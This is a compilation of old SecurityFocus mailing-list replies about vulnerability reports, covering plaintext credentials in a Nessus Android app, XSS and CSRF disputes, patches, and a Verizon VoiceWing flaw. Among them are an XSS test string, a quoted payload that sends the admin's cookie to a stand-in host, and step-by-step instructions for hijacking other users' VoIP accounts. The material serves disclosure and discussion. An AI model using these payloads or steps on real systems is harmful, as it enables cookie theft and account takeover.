NESSUS ANDROID APP - stores login info in plain text

[securityfocus]

Nessus app for android
version 1.0.1

The app allows user to save nessus server info 
IP/username/password.

The app saves this info to
/sdcard/servers.id

This file can be viewed with notepad and password is right there in plain text. 
 this means any app on the system can see that info and possibly transmit it to 
an attacker.

Re: Default key algorithm in Thomson and BT Home Hub routers

[securityfocus]

I've created an online lookup (no brute force) tool that lets you retrieve the 
WPA keys for speedtouch modems: 
http://www.nickkusters.com/articles/79/Online_SpeedTouch_WPA_Key_Lookup.aspx

Re: Lifetype 1.2.7 XSS Vulnerability

[securityfocus]

Fixed in 1.2.8.  Trivial issue, right, and hardly worth reporting, or is there 
a more significant issue that I am missing?

Re: Re: heanet.dl.sourceforge.net hacked?

[securityfocus . com]

The problem is:


md5sums and sizes on http://www.libpng.org/pub/png/libpng.html


do not match sourceforge mirrors and ftp.simplesystems.org etc.


libpng.org: 641193 bytes for libpng-1.2.27.tar.bz2

ftp.simplesystems.org and sourceforge: 804821 bytes

Re: PR07-38: XSS on sIFR

[bugs+securityfocus]

Unfortunately there's a bit of confusion, as Mike Davidson of 
mikeindustries.com is no longer the maintainer of sIFR, and he has not updated 
the sIFR page in a while.


This issue was found and resolved on July 4th 2007, in version 2.0.3. It also 
appears that Internet Explorer is not vulnerable to this attack.


More about 2.0.3 and the XSS issue here: http://novemberborn.net/sifr/2.0.3

Re: Simple Machine Forum - Private section/posts/info disclosure

[klynn . securityfocus]

This is the second SMF vulnerability announced in the recent weeks that appears 
to be caused by administrative misconfiguration rather than an error in SMF. I 
have tested this on a default SMF 1.1.4 test environment and it did not work 
for me. 


Given the fact that previous messages from h3llcode or others in your 
blackroots.it group make mention of the use of .htaccess for controlling access 
to sensitive areas, it seems likely that h3llcode has opened permissions to 
allow escalated privileges to others and is then attempting to control those 
privileges using .htaccess files. Either that or h3llcode is testing the 
advanced search from an account enabled with escalated privileges already.


h3llcode, please create a default SMF 1.1.4 test environment and report back on 
your findings. If it can be duplicated in a properly configured SMF forum, I'm 
very interested in knowing about it.


Thank you,

Kevin Lynn, CISSP

Re: SiteMinder Agent: Cross Site Scripting

[securityfocus]

Would you explain in detail how this is a successful exploit?


I ran 
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0
 against the current 6.0.5.11 SiteMinder Web Agent. 


This attempt is stopped with the following two errors in the Web Agent log.

1. Error.  No redirect target found in namespace.

2. unable to process FCC parameters. Returning SmNoAction.


SiteMinder only causes a redirect to smpwservices.fcc on certain conditions, 
it's not accessed directly, and it would not generate a URL with a query string 
that only includes SMAUTHREASON=.


Or are you attempting to replace SMAUTHREASON= with 
SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 in the query string 
during the normal process with something like burp proxy?


I tested that as well, and the inserted code was ignored and didn't persist to 
the next step during the process.

Re: "BIND 9 DNS Cache Poisoning" by Amit Klein (Trusteer)

[securityfocus]

I don't exactly see how this is new "News" since Zalewski's paper on TCP 
sequence number analysis (which included analysis of versions of BIND):

http://lcamtuf.coredump.cx/newtcp/

-ntn

Re: MkPortal Urlobox Cross Site Request Forgery

[securityfocus]

This is a bogus report. Only Administrators have perms to post URLs in the 
Urlobox. I think we can safely assume that an Admin is not going to hack his 
own website.

-=DKC=-
mkportal.it

Re: MkPortal Urlobox Cross Site Request Forgery

[securityfocus]

I was wrong about this issue in my previous post.

Unofficial Solution:

FIND in /mkportal/modules/urlobox/index.php:
$message = 
preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/',$no_url,$message);
$message = 
preg_replace('/\[IMG\](.+?)\[\/IMG\]/',$no_img,$message);


REPLACE WITH:
$message = 
preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message);
$message = 
preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message);

-=DKC=-

Re: Re: Apple Remote Desktop root vulneravility

[securityfocus]

This is not so much a vulnerability as an oversight.  Who's oversight is up to 
you, but if you run a process remotely as root, and it has a GUI, then the GUI 
will appear on the screen, as a root process.  This usually involves a menubar, 
adn thereby access to System Preferences.  An easy demonstration is using SSH 
to log into a box, sudo -s to get a root shell, and execute ANY program in the 
applications directory (open -a Safari).  You'll get Safari and access to the 
menubar with the login window appearing as a hinderance.  This isn't anything 
new, the guy's using RADMIND have been fighting it since 10.4 came out and 
redid the way the system handles the login window at startup.  On the automated 
side, applicatiosn like iHook have created a very nice work around for this.  
At the ARD end, the lock screen function does this well enough.  Its merely a 
matter of testing deployment on a machine you have physical access to before 
shoving it down to x-number of computers.  


This is something John Welch (bynkii.com) harped about this spring.  Its shoddy 
design on many App Designers by not giving a proper remote installer or pkg 
file that can execute silently.  Whether or not this is something Apple needs 
to fix, that's up for debate.  They are not necessairly in the wrong here, 
regardless of how much it may appear to be an obvious security flaw.  Maybe 
they should check to see if the LoginWindow is displayed before allowing a gui 
app to run with root priviledges, but after debating this issue enough i've 
come to the conclusion that Apple, the programmers, and the administrators, are 
all at fault at some level. 

Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability

[securityfocus]

I made this script a long time ago and actually I don´t use it anymore (I use a 
newer version which is not ready for "the real world" yet). By accident I 
discovered this page when I showed someone how many hits you will get when you 
google on your own name.


You say "Venedor Contacted, But No Response", but I haven't seen a mail about 
this, or it was disguised as spam. and I removed it.


But I made a quick update (remove the language option) and placed it on my site 
(http://matthijs.draijer.org/download.php?id=35)

Re: Photocycle v1.0 - XSS

[securityfocus]

Patched within a couple hours of discovery. Download version 1.1.


http://adambrown.info/p/tools/photocycle";>Photocycle homepage

Verizon Voicewing and Linksys PAP2-VN

[securityfocus]

Product: Verizon voicewing combined with Linksys PAP2-VN

Reported by: Haavar Valeur

Status: Vendor unwilling to address the problem

Reported: Mar 15, 2006



I found a way it is possible to make and receive calls from other Verizon 
accounts.


The problem is that Verizon publishes encrypted configuration files containing 
the username and password. These files are published through tftp and http, and 
are publicly readable. A vulnerability is created because the PAP2-VN adapter 
trusts the web server to give it the correct file. The PAP2 adapter accepts and 
decrypts configuration files for other accounts if they are available at the 
URI where the adapter expects to find it's configuration file.


The following steps can be made by anyone with a PAP2-VN adapter to access 
random users accounts:

1) Create a subnet that you are able to isolate from the internet

2) Block all TFTP access from the subnet to the Internet. This will make the 
adapter failover to http (I did not bother to set up a tftp server). 

3) Redirect all HTTP request made from the subnet to a web server you control 
(possible with e.g. iptables)

4) Connect the PAP2 adapter to the subnet and wait for the adapter to try to 
get the config file.

5) Look in the web server access log or tcpdump to find what URL the PAP2 tries 
to access on the web server

6) The URL should contain the MAC address of the PAP2. Try finding another 
valid mac by changing one of the least significant digits, and download the 
file from verizons web server.

7) Rename the file you downloaded to the filename the PAP2 tried to access and 
put it on the web server so the PAP2 will download this file.

8) The PAP2 will download and decrypt this file containing the account 
information of the other user and connect to the SIP server.

9) Now you can make and receive calls from another account


This has been tested a PAP2-VN with firmware v2.0.10 and Verizon Voicewing, but 
could apply to other vendors using this adapter.

Re: Cross-site scripting vulnerability in CF 5.0

[SecurityFocus]

Something to note:

The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file during opening.

So, It's generally a better (and safer, with this cross-site scripting
problem that's been around for years) to view the logs file via a text
viewer on the sytem.

By default, it's c:\cfusion\log\*.log


On Mon, 16 Dec 2002, KiLL CoLe wrote:

> Cross-site scripting vulnerability in CF 5.0.  This
> issue was brought up to macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public.  the coldfusion
> administrator allows you to view your application log
> via your web browser.  Under certain conditions, it is
> possible to remotely alter coldfusions application
> log.  take the following code:
>
> 
>SELECT * FROM Products
>Where ProductId = #int(url.productid)#
> 
>
> if the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed.  Analyze this
> code:
> if url.productid (from the above example) were passed
> in as:
>
> 
> document.frame1.location="http://www.domain.com/index.cfm?stealcookie=";
> + document.cookie
>
> this would enable an attacker to steal the value of
> the coldfusion administrators cookie.  Decrypting the
> coldfusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>
> __
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
>

Re: ZoneEdit Account Hijack Vulnerability

[securityfocus]

In-Reply-To: <000701c284d5$ccf1e2e0$[EMAIL PROTECTED]>

>
>The webmasters of this site were informed of this vulnerability on 
>05 November 2002.  To date, no useable information on protecting 
>against this vulnerability has been received.
>

Matt and Paul were contacted on 05 November 2002 to notify them that a 
security review had been completed, and to please re-run their tests. No 
reply has yet been received.

Erik Aronesty
ZoneEdit CEO